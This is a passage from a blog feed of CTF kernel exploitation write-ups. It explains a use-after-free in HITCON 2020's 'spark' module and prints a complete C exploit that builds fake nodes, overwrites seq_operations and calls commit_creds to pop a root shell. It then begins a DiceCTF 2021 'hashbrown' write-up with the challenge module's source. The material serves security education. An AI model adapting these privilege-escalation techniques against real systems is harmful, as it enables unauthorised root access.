style="display:flex;"><span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">spark_link_t</span><span style="color:#f92672">*</span> bk; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">spark_link_t</span><span style="color:#f92672">*</span> fd; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">spark_node_t</span><span style="color:#f92672">*</span> target; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> weight; </span></span><span style="display:flex;"><span>} <span style="color:#66d9ef">spark_link_t</span>; </span></span><span style="display:flex;"><span><span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">spark_node_t</span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> idx; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint32_t</span> ref_cnt; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint32_t</span> __padding_0; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">char</span> start_lock[<span style="color:#ae81ff">32</span>]; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint32_t</span> is_finalized; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint32_t</span> __padding_1; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">char</span> nb_lock[<span style="color:#ae81ff">32</span>]; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> link_cnt; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">spark_link_t</span><span style="color:#f92672">*</span> bk; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">spark_link_t</span><span style="color:#f92672">*</span> fd; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> idx_in_table; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">spark_node_table_t</span><span style="color:#f92672">*</span> node_table; </span></span><span style="display:flex;"><span>} <span style="color:#66d9ef">spark_node_t</span>; </span></span></code></pre></div><p>And the invalid values in <code>spark_node_t</code> may cause crash. And with several tries I found if <code>start_lock</code> is zeros and bk and fd is correctly set, crash does not occurs.</p> <p>So, I try finding proper object which can control UAF object and I decide to use <a href="https://elixir.bootlin.com/linux/v5.9.11/source/ipc/msgutil.c#L37"><code>struct msg_msgseg</code></a>. It allocated by user-defined length and user&rsquo;s data. And the best thing is it can be fully controlled by user!! (except first 8 bytes). Because the first 8 bytes of <code>spark_node_t</code> is index of each node, it can be set any value.</p> <p>Now we can control the UAF node by <code>struct msg_msgseg</code>.</p> <h4 id="prevent-crash-while-finalize">Prevent crash while finalize</h4> <p>By using <code>struct msg_msgseg</code> and set <code>start_lock</code> with zeros, the crash in <code>mutex_lock</code> can be prevented. But there is the traversal mechanism which travel the linked nodes in <code>traversal</code>. The traversal ends when <code>&amp;node-&gt;bk == cur_node-&gt;bk</code>.</p> <p>Since we does not know the address of node, we cannot stop the traversal and this occurs the crash&hellip;. However differ my expectation, the crash does not reboot the OS and print kernel&rsquo;s registers! Morever in the kernel&rsquo;s registers there is the address of UAF node (R13).</p> <p>With this observation, I crash the kernel several times and the address of UAF node may not be changed. So I think I can use it.</p> <p>After one crashing, I set bk and fd with the value of R13+0x60 (this is R12 of panic information) and execute the program, no crash occurs in <code>traversal</code>.</p> <h3 id="make-invalid-node-table-by-finalize">Make invalid node table by finalize</h3> <p>The <code>spark_node_finalize</code> function makes the node table and set each linked node&rsquo;s index in the table. For example, the graph is following:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plaintext" data-lang="plaintext"><span style="display:flex;"><span> B -- 10 -- D </span></span><span style="display:flex;"><span> / \ </span></span><span style="display:flex;"><span> 4 | </span></span><span style="display:flex;"><span> / | </span></span><span style="display:flex;"><span>A 5 </span></span><span style="display:flex;"><span> \ | </span></span><span style="display:flex;"><span> 2 | </span></span><span style="display:flex;"><span> \ | </span></span><span style="display:flex;"><span> C -- 3 - E </span></span></code></pre></div><p>And if we request finalize on node A, the A&rsquo;s <code>node_table</code> and <code>idx_in_table</code> of each nodes are set by following:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plaintext" data-lang="plaintext"><span style="display:flex;"><span>0: A (its `idx_in_table` is 0) </span></span><span style="display:flex;"><span>1: C (its `idx_in_table` is 1) </span></span><span style="display:flex;"><span>2: E (its `idx_in_table` is 2) </span></span><span style="display:flex;"><span>3: B (its `idx_in_table` is 3) </span></span><span style="display:flex;"><span>4: D (its `idx_in_table` is 4) </span></span></code></pre></div><p>The <code>node_table</code> and <code>idx_in_table</code> is used in <code>spark_graph_query</code> (And in this function, 8 bytes OOB write can be triggered, explained in later).</p> <p>Since the environment of this challenge is No-SMAP and No-SMEP and we can controll fd and bk of UAF node, we can insert fake nodes (defined in user-land) to linked list. So for the OOB write I set fake nodes to build <code>node_table</code> like following:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plaintext" data-lang="plaintext"><span style="display:flex;"><span>0: A </span></span><span style="display:flex;"><span>1: UAF node </span></span><span style="display:flex;"><span>2: Fake user-land node </span></span><span style="display:flex;"><span>3: Fake user-land node </span></span></code></pre></div><h3 id="trigger-oob-write">Trigger OOB write</h3> <p>In <code>spark_graph_query</code> function, there is a following routine:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#75715e">// ... </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>temp_dists <span style="color:#f92672">=</span> (<span style="color:#66d9ef">__int64</span> <span style="color:#f92672">*</span>)<span style="color:#a6e22e">_kmalloc</span>(<span style="color:#ae81ff">8</span> <span style="color:#f92672">*</span> node_table<span style="color:#f92672">-&gt;</span>size, _GFP_IO <span style="color:#f92672">|</span> ___GFP_FS <span style="color:#f92672">|</span> ___GFP_DIRECT_RECLAIM <span style="color:#f92672">|</span> ___GFP_KSWAPD_RECLAIM); </span></span><span style="display:flex;"><span><span style="color:#75715e">// ... </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>bk <span style="color:#f92672">=</span> cur_node<span style="color:#f92672">-&gt;</span>bk; </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> ( end <span style="color:#f92672">=</span> <span style="color:#f92672">&amp;</span>cur_node<span style="color:#f92672">-&gt;</span>bk; bk <span style="color:#f92672">!=</span> (<span style="color:#66d9ef">spark_link_t</span> <span style="color:#f92672">*</span>)end; bk <span style="color:#f92672">=</span> bk<span style="color:#f92672">-&gt;</span>bk ) </span></span><span style="display:flex;"><span>{ </span></span><span style="display:flex;"><span> p_upated_dist <span style="color:#f92672">=</span> <span style="color:#f92672">&amp;</span>temp_dists[bk<span style="color:#f92672">-&gt;</span>target<span style="color:#f92672">-&gt;</span>idx_in_table]; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> ( <span style="color:#f92672">*</span>p_upated_dist <span style="color:#f92672">!=</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span> ) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> dist_of_this_path <span style="color:#f92672">=</span> dist_to_cur <span style="color:#f92672">+</span> bk<span style="color:#f92672">-&gt;</span>weight; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> ( <span style="color:#f92672">*</span>p_upated_dist <span style="color:#f92672">&gt;</span> dist_of_this_path ) </span></span><span style="display:flex;"><span> <span style="color:#f92672">*</span>p_upated_dist <span style="color:#f92672">=</span> dist_of_this_path; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span><span style="color:#75715e">// ... </span></span></span></code></pre></div><p>Because our target (and its idx_in_table) of <code>node_table</code> can be controlld by us, we can write <code>temp_dists</code> with arbitrary index by setting <code>idx_in_table</code>. Furthermore since the weigth of bk node can be controlled by user, we can get arbitrary 8 bytes OOB write.</p> <h3 id="rip-control">RIP control</h3> <p>Since the <code>size</code> of <code>node_bale</code> is 4 and then the <code>kamlloc</code> allocate 32 bytes chunk, I decide to use <a href="https://elixir.bootlin.com/linux/v5.9.11/source/include/linux/seq_file.h#L31"><code>struct seq_operations</code></a> to control RIP.</p> <p>We can run user-mode code via RIP control because SMEP is not enabled.</p> <h3 id="exploit-code">Exploit code</h3> <div class="collapsable-code"> <input id="984153267" type="checkbox" checked /> <label for="984153267"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">HITCON2020-spark-exploit.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;fcntl.h&gt; #include &lt;linux/keyctl.h&gt; #include &lt;stdarg.h&gt; #include &lt;stddef.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/ipc.h&gt; #include &lt;sys/mman.h&gt; #include &lt;sys/msg.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;sys/types.h&gt; #include &lt;syscall.h&gt; #include &lt;unistd.h&gt; static void get_enter_to_continue(const char* msg); static void fatal(const char* msg); static void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } static void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } struct msgbuf { long mtype; /* message type, must be &gt; 0 */ char mtext[1]; /* message data */ }; int send_msg(int msgqid, char* data, size_t size, long mtype); int recv_msg(int msgqid, char* data, size_t size, long mtype); int send_msg(int msgqid, char* data, size_t size, long mtype) { struct msgbuf* m = malloc(sizeof(long) + size); int ret = -1; memcpy(m-&gt;mtext, data, size); m-&gt;mtype = mtype; ret = msgsnd(msgqid, m, size, 0); free(m); return ret; } int recv_msg(int msgqid, char* data, size_t size, long mtype) { struct msgbuf* m = malloc(sizeof(long) + size); int ret = -1; m-&gt;mtype = mtype; ret = msgrcv(msgqid, m, size, mtype, 0); memcpy(data, m-&gt;mtext, size); free(m); return ret; } #define VULN_DEV_NAME &#34;/dev/node&#34; #define VULN_DEV_CMD_LINK 0x4008D900 #define VULN_DEV_CMD_FINALIZE 0xD902 #define VULN_DEV_CMD_QUERY 0xC010D903 #define VULN_DEV_CMD_GET_INFO 0x8018D901 typedef struct query_t { int fd1; int fd2; int64_t distance; } query_t; typedef struct node_info_t { uint64_t link_cnt; uint64_t idx_in_weights; uint64_t weights_size; } node_info_t; typedef struct spark_link_t { struct spark_link_t* bk; struct spark_link_t* fd; struct spark_node_t* target; uint64_t weight; } spark_link_t; typedef struct spark_node_table_t { uint64_t size; uint64_t capacity; struct spark_node_t** nodes; } spark_node_table_t; typedef struct spark_node_t { uint64_t idx; uint32_t ref_cnt; uint32_t __padding_0; char start_lock[32]; uint32_t is_finalized; uint32_t __padding_1; char nb_lock[32]; uint64_t link_cnt; struct spark_link_t* bk; struct spark_link_t* fd; uint64_t idx_in_table; spark_node_table_t* node_table; } spark_node_t; static int vuln_dev_link(int fd1, int fd2, int weight); static int vuln_dev_finalize(int fd); static int64_t vuln_dev_query(int fd, int fd1, int fd2); static node_info_t vuln_dev_get_info(int fd); static int vuln_dev_link(int fd1, int fd2, int weight) { return ioctl(fd1, VULN_DEV_CMD_LINK, (uint64_t)fd2 | ((uint64_t)weight &lt;&lt; 32)); } static int vuln_dev_finalize(int fd) { return ioctl(fd, VULN_DEV_CMD_FINALIZE); } static int64_t vuln_dev_query(int fd, int fd1, int fd2) { query_t qry = {.fd1 = fd1, .fd2 = fd2, .distance = -1}; if (ioctl(fd, VULN_DEV_CMD_QUERY, &amp;qry)) { return -1; } return qry.distance; } static node_info_t vuln_dev_get_info(int fd) { node_info_t info; ioctl(fd, VULN_DEV_CMD_GET_INFO, &amp;info); return info; } uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); } static void get_shell() { puts(&#34;[+] Get shell!&#34;); char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; execve(&#34;/bin/sh&#34;, argv, envp); } static void restore_state() { asm volatile( &#34;swapgs;\n&#34; &#34;mov qword ptr [rsp+0x20], %[u_ss];\n&#34; &#34;mov qword ptr [rsp+0x18], %[u_sp];\n&#34; &#34;mov qword ptr [rsp+0x10], %[u_rflags];\n&#34; &#34;mov qword ptr [rsp+0x08], %[u_cs];\n&#34; &#34;mov qword ptr [rsp+0x00], %[u_ret];\n&#34; &#34;iretq;\n&#34; ::[u_cs] &#34;r&#34;(user_cs), [u_ss] &#34;r&#34;(user_ss), [u_sp] &#34;r&#34;(user_sp), [u_rflags] &#34;r&#34;(user_rflags), [u_ret] &#34;r&#34;(get_shell)); } __attribute__((naked)) static void get_root_shell() { asm volatile( &#34;mov rax, [rsp];\n&#34; &#34;sub rax, 0x3185d4;\n&#34; // rax will be kernel_base &#34;mov r15, rax;\n&#34; // r15 will be kernel_base // Call prepare_kernel_cred &#34;xor rdi, rdi;\n&#34; &#34;add rax, 0xbe9c0;\n&#34; // rax will be prepare_kernel_cred &#34;call rax;\n&#34; // Call commit_creds &#34;mov rdi, rax;\n&#34; &#34;mov rax, r15;\n&#34; &#34;add rax, 0xbe550;\n&#34; // rax will be commit_creds &#34;call rax;\n&#34; : : : &#34;rax&#34;, &#34;rdi&#34;, &#34;r15&#34;, &#34;memory&#34;); restore_state(); } int main(int argc, char* argv[]) { save_state(); int fds[2]; puts(&#34;[*] Alloc 2 nodes&#34;); for (int i = 0; i &lt; sizeof(fds) / 4; ++i) { fds[i] = open(VULN_DEV_NAME, O_RDONLY); } puts(&#34;[*] Link 2 nodes&#34;); vuln_dev_link(fds[0], fds[1], 0); puts(&#34;[*] Trigger UAF and build fake node and fake link&#34;); close(fds[1]); char* msg_mem = malloc(0x2000); memset(msg_mem, &#39;a&#39;, 0x2000); memset(msg_mem + 0x1000 - 48, 0, 0x1000 + 48); char* fake_mem = malloc(0x1000); memset(fake_mem, 0, 0x1000); spark_node_t* fake_node_1 = (spark_node_t*)fake_mem; spark_node_t* fake_node_2 = (spark_node_t*)(fake_mem + sizeof(spark_node_t)); spark_link_t* fake_link_1 = (spark_link_t*)(fake_mem + 2 * sizeof(spark_node_t)); spark_link_t* fake_link_2 = (spark_link_t*)(fake_mem + 2 * sizeof(spark_node_t) + sizeof(spark_link_t)); spark_link_t* fake_link_3 = (spark_link_t*)(fake_mem + 2 * sizeof(spark_node_t) + 2 * sizeof(spark_link_t)); spark_node_t* uaf_fake_node_data = (spark_node_t*)(msg_mem + 0x1000 - 48 - 8); printf( &#34;[*] fake_node_1: %p, fake_link_1: %p, fake_node_2: %p, fake_link_2: &#34; &#34;%p\n&#34;, fake_node_1, fake_link_1, fake_node_2, fake_link_2); if (argc == 2) { uint64_t uaf_fake_node_addr = strtoull(argv[1], NULL, 16); // R12(==R13+0x60) of panic uaf_fake_node_data-&gt;ref_cnt = 3; uaf_fake_node_data-&gt;idx_in_table = 0xdeadbeef; uaf_fake_node_data-&gt;bk = (spark_link_t*)fake_link_1; uaf_fake_node_data-&gt;fd = (spark_link_t*)fake_link_2; fake_link_1-&gt;target = fake_node_1; fake_link_1-&gt;bk = (spark_link_t*)fake_link_2; fake_link_1-&gt;fd = (spark_link_t*)uaf_fake_node_addr; fake_link_2-&gt;target = fake_node_2; fake_link_2-&gt;bk = (spark_link_t*)uaf_fake_node_addr; fake_link_2-&gt;fd = (spark_link_t*)fake_node_1; fake_node_1-&gt;idx = 0xdeadbeef; fake_node_1-&gt;ref_cnt = 3; fake_node_1-&gt;is_finalized = 0; fake_node_1-&gt;bk = (spark_link_t*)&amp;fake_node_1-&gt;bk; fake_node_1-&gt;fd = (spark_link_t*)&amp;fake_node_1; fake_node_2-&gt;idx = 0xcafebebe; fake_node_2-&gt;ref_cnt = 3; fake_node_2-&gt;is_finalized = 0; fake_node_2-&gt;bk = (spark_link_t*)&amp;fake_node_2-&gt;bk; fake_node_2-&gt;fd = (spark_link_t*)&amp;fake_node_2; } else { uaf_fake_node_data-&gt;ref_cnt = 1; } send_msg(1, msg_mem, 0x1000 - 48 + 0x80 - 8, 1); puts(&#34;[*] Put fake node to node_tables&#34;); vuln_dev_finalize(fds[0]); puts(&#34;[*] Modify nodes...&#34;); fake_node_1-&gt;bk = (spark_link_t*)fake_link_3; fake_node_1-&gt;fd = (spark_link_t*)fake_link_3; fake_link_3-&gt;bk = (spark_link_t*)&amp;fake_node_1-&gt;bk; fake_link_3-&gt;fd = (spark_link_t*)&amp;fake_node_1-&gt;bk; fake_link_3-&gt;target = fake_node_2; fake_link_3-&gt;weight = (uint64_t)get_root_shell; fake_node_2-&gt;idx_in_table = 4; puts(&#34;[*] Spraying seq_ops...&#34;); int seq_ops_spray[100]; for (int i = 0; i &lt; sizeof(seq_ops_spray) / 4; ++i) { seq_ops_spray[i] = open(&#34;/proc/self/stat&#34;, O_RDONLY); } close(seq_ops_spray[0]); if (fake_node_1-&gt;idx_in_table != 0) { puts(&#34;[+] Success to build fake node&#34;); } else { puts(&#34;[-] Failed to build fake node&#34;); return -1; } int new_nodes[4]; for (int i = 0; i &lt; sizeof(new_nodes) / 4; ++i) { new_nodes[i] = open(VULN_DEV_NAME, O_RDONLY); if (i != 0) { vuln_dev_link(new_nodes[i - 1], new_nodes[i], 0x100 + i); } } vuln_dev_finalize(new_nodes[3]); puts(&#34;[*] Trigger OOB and overwrite seq_ops&#34;); vuln_dev_query(fds[0], new_nodes[1], new_nodes[0]); puts(&#34;[*] ACE!!&#34;); for (int i = 0; i &lt; sizeof(seq_ops_spray) / 4; ++i) { char buf[1]; read(seq_ops_spray[i], buf, 1); } memset(fake_mem, 0, 0x1000); return 0; }</code></pre></div> <p>To get a root shell, we need to execute the exploit program twice:</p> <ol> <li>Run the program without any arguments.</li> <li>Run the program with value of kernel&rsquo;s R12 register shown by kernel panic.</li> </ol> <p>For example, after executing this program without any arguments, the kernel panic occurs and its information is printed as following:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plaintext" data-lang="plaintext"><span style="display:flex;"><span>[ 60.936674] BUG: kernel NULL pointer dereference, address: 0000000000000010 </span></span><span style="display:flex;"><span>[ 60.937311] #PF: supervisor read access in kernel mode </span></span><span style="display:flex;"><span>[ 60.937974] #PF: error_code(0x0000) - not-present page </span></span><span style="display:flex;"><span>[ 60.938416] PGD de07067 P4D de07067 PUD de06067 PMD 0 </span></span><span style="display:flex;"><span>[ 60.939092] Oops: 0000 [#1] SMP NOPTI </span></span><span style="display:flex;"><span>[ 60.939439] CPU: 0 PID: 123 Comm: exploit Tainted: G E 5.9.11 #1 </span></span><span style="display:flex;"><span>[ 60.939824] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 </span></span><span style="display:flex;"><span>[ 60.940679] RIP: 0010:traversal+0x52/0x110 [spark] </span></span><span style="display:flex;"><span>[ 60.941182] Code: c0 75 77 48 8d 50 01 49 89 16 49 89 44 24 70 49 8b 36 49 3b 76 08 0f 84 81 00 00 00 49 8b 5c 24 60 49 83 c4 60 0 </span></span><span style="display:flex;"><span>[ 60.942692] RSP: 0018:ffffc900001d7e10 EFLAGS: 00000207 </span></span><span style="display:flex;"><span>[ 60.943401] RAX: ffff88800ddcaf20 RBX: 0000000000000000 RCX: 00000000000008d3 </span></span><span style="display:flex;"><span>[ 60.943929] RDX: 00000000000008d2 RSI: c1f7a9928c6ca877 RDI: 0000000000031060 </span></span><span style="display:flex;"><span>[ 60.944350] RBP: ffffc900001d7e38 R08: ffffc900001d7d98 R09: 0000000000000000 </span></span><span style="display:flex;"><span>[ 60.944940] R10: 0000000000000000 R11: 0000000000000000 R12: ffff88800dd4fb60 </span></span><span style="display:flex;"><span>[ 60.945509] R13: ffff88800dd4fb00 R14: ffff88800ddcaf80 R15: ffff88800dd4fb10 </span></span><span style="display:flex;"><span>[ 60.946147] FS: 0000000001787380(0000) GS:ffff88800f600000(0000) knlGS:0000000000000000 </span></span><span style="display:flex;"><span>[ 60.946744] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 </span></span><span style="display:flex;"><span>[ 60.947116] CR2: 0000000000000010 CR3: 000000000de04000 CR4: 00000000000006f0 </span></span><span style="display:flex;"><span>[ 60.947932] Call Trace: </span></span><span style="display:flex;"><span>[ 60.948909] traversal+0xa0/0x110 [spark] </span></span><span style="display:flex;"><span>[ 60.949412] spark_node_finalize+0x83/0xb0 [spark] </span></span><span style="display:flex;"><span>[ 60.949769] node_ioctl+0x136/0x250 [spark] </span></span><span style="display:flex;"><span>[ 60.949977] ? tomoyo_file_ioctl+0x19/0x20 </span></span><span style="display:flex;"><span>[ 60.950249] __x64_sys_ioctl+0x96/0xd0 </span></span><span style="display:flex;"><span>[ 60.950477] do_syscall_64+0x37/0x80 </span></span><span style="display:flex;"><span>[ 60.950819] entry_SYSCALL_64_after_hwframe+0x44/0xa9 </span></span><span style="display:flex;"><span>[ 60.951459] RIP: 0033:0x423d3d </span></span><span style="display:flex;"><span>[ 60.951794] Code: 04 25 28 00 00 00 48 89 45 c8 31 c0 48 8d 45 10 c7 45 b0 10 00 00 00 48 89 45 b8 48 8d 45 d0 48 89 45 c0 b8 10 0 </span></span><span style="display:flex;"><span>[ 60.953022] RSP: 002b:00007fff9334fb60 EFLAGS: 00000246 ORIG_RAX: 0000000000000010 </span></span><span style="display:flex;"><span>[ 60.953536] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 0000000000423d3d </span></span><span style="display:flex;"><span>[ 60.954020] RDX: 0000000000000000 RSI: 000000000000d902 RDI: 0000000000000003 </span></span><span style="display:flex;"><span>[ 60.954957] RBP: 00007fff9334fbb0 R08: 0000000000000001 R09: 0000000000000000 </span></span><span style="display:flex;"><span>[ 60.955548] R10: 0000000000000000 R11: 0000000000000246 R12: 00007fff9334ff18 </span></span><span style="display:flex;"><span>[ 60.956501] R13: 00007fff9334ff28 R14: 00000000004ae868 R15: 0000000000000001 </span></span><span style="display:flex;"><span>[ 60.957217] Modules linked in: spark(E) </span></span><span style="display:flex;"><span>[ 60.957834] CR2: 0000000000000010 </span></span><span style="display:flex;"><span>[ 60.958602] ---[ end trace c0dd566a19a98686 ]--- </span></span><span style="display:flex;"><span>[ 60.958973] RIP: 0010:traversal+0x52/0x110 [spark] </span></span><span style="display:flex;"><span>[ 60.959299] Code: c0 75 77 48 8d 50 01 49 89 16 49 89 44 24 70 49 8b 36 49 3b 76 08 0f 84 81 00 00 00 49 8b 5c 24 60 49 83 c4 60 0 </span></span><span style="display:flex;"><span>[ 60.960089] RSP: 0018:ffffc900001d7e10 EFLAGS: 00000207 </span></span><span style="display:flex;"><span>[ 60.960471] RAX: ffff88800ddcaf20 RBX: 0000000000000000 RCX: 00000000000008d3 </span></span><span style="display:flex;"><span>[ 60.961083] RDX: 00000000000008d2 RSI: c1f7a9928c6ca877 RDI: 0000000000031060 </span></span><span style="display:flex;"><span>[ 60.961918] RBP: ffffc900001d7e38 R08: ffffc900001d7d98 R09: 0000000000000000 </span></span><span style="display:flex;"><span>[ 60.962316] R10: 0000000000000000 R11: 0000000000000000 R12: ffff88800dd4fb60 </span></span><span style="display:flex;"><span>[ 60.962646] R13: ffff88800dd4fb00 R14: ffff88800ddcaf80 R15: ffff88800dd4fb10 </span></span><span style="display:flex;"><span>[ 60.963020] FS: 0000000001787380(0000) GS:ffff88800f600000(0000) knlGS:0000000000000000 </span></span><span style="display:flex;"><span>[ 60.963489] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 </span></span><span style="display:flex;"><span>[ 60.963832] CR2: 0000000000000010 CR3: 000000000de04000 CR4: 00000000000006f0 </span></span><span style="display:flex;"><span>Killed </span></span></code></pre></div><p>Then, execute the program with <code>ffff88800dd4fb60</code> (its R12 value of printed panic information).</p> <h2 id="reference">Reference</h2> <ul> <li><a href="https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/HITCON/2020/spark">https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/HITCON/2020/spark</a></li> </ul> /posts/kernel/write-ups/ctf/dicectf2021-hashbrown/ Tue, 11 Feb 2025 13:29:06 +0000 /posts/kernel/write-ups/ctf/dicectf2021-hashbrown/ <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>linux version: <a href="https://elixir.bootlin.com/linux/v5.11-rc3/source"><code>5.11.0-rc3</code></a> <ul> <li>CONFIG_SLAB_FREELIST_RANDOM=y</li> <li>CONFIG_SLAB=y</li> <li>CONFIG_FG_KASLR=y</li> </ul> </li> <li>unprivileged_userfaultfd: 1</li> <li>unprivileged_bpf_disabled: 0</li> </ul> <h3 id="module">Module</h3> <div class="collapsable-code"> <input id="381792654" type="checkbox" checked /> <label for="381792654"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">DiceCTF2021-hashbrown-module.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;linux/device.h&gt; #include &lt;linux/fs.h&gt; #include &lt;linux/kernel.h&gt; #include &lt;linux/module.h&gt; #include &lt;linux/mutex.h&gt; #include &lt;linux/slab.h&gt; #include &lt;linux/uaccess.h&gt; #define DEVICE_NAME &#34;hashbrown&#34; #define CLASS_NAME &#34;hashbrown&#34; MODULE_AUTHOR(&#34;FizzBuzz101&#34;); MODULE_DESCRIPTION(&#34;Here&#39;s a hashbrown for everyone!&#34;); MODULE_LICENSE(&#34;GPL&#34;); #define ADD_KEY 0x1337 #define DELETE_KEY 0x1338 #define UPDATE_VALUE 0x1339 #define DELETE_VALUE 0x133a #define GET_VALUE 0x133b #define SIZE_ARR_START 0x10 #define SIZE_ARR_MAX 0x200 #define MAX_ENTRIES 0x400 #define MAX_VALUE_SIZE 0xb0 #define GET_THRESHOLD(size) size - (size &gt;&gt; 2) #define INVALID 1 #define EXISTS 2 #define NOT_EXISTS 3 #define MAXED 4 static DEFINE_MUTEX(operations_lock); static DEFINE_MUTEX(resize_lock); static long hashmap_ioctl(struct file *file, unsigned int cmd, unsigned long arg); static int major; static struct class *hashbrown_class = NULL; static struct device *hashbrown_device = NULL; static struct file_operations hashbrown_fops = {.unlocked_ioctl = hashmap_ioctl}; typedef struct { uint32_t key; uint32_t size; char *src; char *dest; } request_t; struct hash_entry { uint32_t key; uint32_t size; char *value; struct hash_entry *next; }; typedef struct hash_entry hash_entry; typedef struct { uint32_t size; uint32_t threshold; uint32_t entry_count; hash_entry **buckets; } hashmap_t; hashmap_t hashmap; static noinline uint32_t get_hash_idx(uint32_t key, uint32_t size); static noinline long resize(request_t *arg); static noinline void resize_add(uint32_t idx, hash_entry *entry, hash_entry **new_buckets); static noinline void resize_clean_old(void); static noinline long add_key(uint32_t idx, uint32_t key, uint32_t size, char *src); static noinline long delete_key(uint32_t idx, uint32_t key); static noinline long update_value(uint32_t idx, uint32_t key, uint32_t size, char *src); static noinline long delete_value(uint32_t idx, uint32_t key); static noinline long get_value(uint32_t idx, uint32_t key, uint32_t size, char *dest); #pragma GCC push_options #pragma GCC optimize(&#34;O1&#34;) static long hashmap_ioctl(struct file *file, unsigned int cmd, unsigned long arg) { long result; request_t request; uint32_t idx; if (cmd == ADD_KEY) { if (hashmap.entry_count == hashmap.threshold &amp;&amp; hashmap.size &lt; SIZE_ARR_MAX) { mutex_lock(&amp;resize_lock); result = resize((request_t *)arg); mutex_unlock(&amp;resize_lock); return result; } } mutex_lock(&amp;operations_lock); if (copy_from_user((void *)&amp;request, (void *)arg, sizeof(request_t))) { result = INVALID; } else if (cmd == ADD_KEY &amp;&amp; hashmap.entry_count == MAX_ENTRIES) { result = MAXED; } else { idx = get_hash_idx(request.key, hashmap.size); switch (cmd) { case ADD_KEY: result = add_key(idx, request.key, request.size, request.src); break; case DELETE_KEY: result = delete_key(idx, request.key); break; case UPDATE_VALUE: result = update_value(idx, request.key, request.size, request.src); break; case DELETE_VALUE: result = delete_value(idx, request.key); break; case GET_VALUE: result = get_value(idx, request.key, request.size, request.dest); break; default: result = INVALID; break; } } mutex_unlock(&amp;operations_lock); return result; } static uint32_t get_hash_idx(uint32_t key, uint32_t size) { uint32_t hash; key ^= (key &gt;&gt; 20) ^ (key &gt;&gt; 12); hash = key ^ (key &gt;&gt; 7) ^ (key &gt;&gt; 4); return hash &amp; (size - 1); } static noinline void resize_add(uint32_t idx, hash_entry *entry, hash_entry **new_buckets) { if (!new_buckets[idx]) { new_buckets[idx] = entry; } else { entry-&gt;next = new_buckets[idx]; new_buckets[idx] = entry; } } static noinline void resize_clean_old() { int i; hash_entry *traverse, *temp; for (i = 0; i &lt; hashmap.size; 